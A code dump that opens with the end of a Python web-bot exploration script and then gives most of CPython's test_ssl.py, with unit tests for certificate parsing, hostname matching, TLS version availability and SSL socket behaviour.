task.utg.states_dir = os.path.join(args.output_dir, "states")
# cache_browser = CacheBrowser(
# utgs=[task.utg for task in tasks]
# )
arg_env = WebBotEnv(
tasks=tasks,
browser=arg_browser,
visualize=args.visualize
)
if args.demonstrate:
arg_env.demonstrate(output_dir=args.output_dir, save_utg=args.save_utg)
if args.replay_source:
arg_env.replay(replay_source=args.replay_source)
if args.explore:
arg_env.explore(output_dir=args.output_dir, save_utg=args.save_utg)
if __name__ == "__main__":
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext()
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
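# Sketch of how the two helpers above are meant to be combined (illustrative
# only; this is not one of the tests defined in this module):
#
#   @requires_tls_version('TLSv1_3')
#   def test_something_tls13(self):
#       ...  # body runs only when has_tls_version('TLSv1_3') is True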
requires_minimum_version = unittest.skipUnless(
    hasattr(ssl.SSLContext, 'minimum_version'),
    "requires OpenSSL >= 1.1.0g"
)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
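# Worked example for asn1time() (illustrative): on the specific OpenSSL build
# checked above (_OPENSSL_API_VERSION == (0, 9, 8, 9, 15)),
#   asn1time("Mar 29 12:29:49 2033 GMT") -> "Mar 29 12:29:00 2033 GMT"
# (seconds zeroed); on any other build the string is returned unchanged.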
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
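# Minimal usage sketch for test_wrap_socket() (the host/port are hypothetical
# and shown only for illustration):
#
#   with socket.create_connection(('localhost', 4433)) as sock:
#       with test_wrap_socket(sock, cert_reqs=ssl.CERT_NONE) as ssock:
#           ssock.sendall(b'ping')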
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
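# Typical pattern built on testing_context() in the connection tests (sketch):
#
#   client_context, server_context, hostname = testing_context()
#   # server side: server_context.wrap_socket(conn, server_side=True)
#   # client side: client_context.wrap_socket(sock, server_hostname=hostname)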
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
        idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # a wildcard in the first fragment combined with IDNA A-labels in
        # subsequent fragments is not supported (all of the following fail).
        idna = 'www*.pythön.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if support.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if support.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
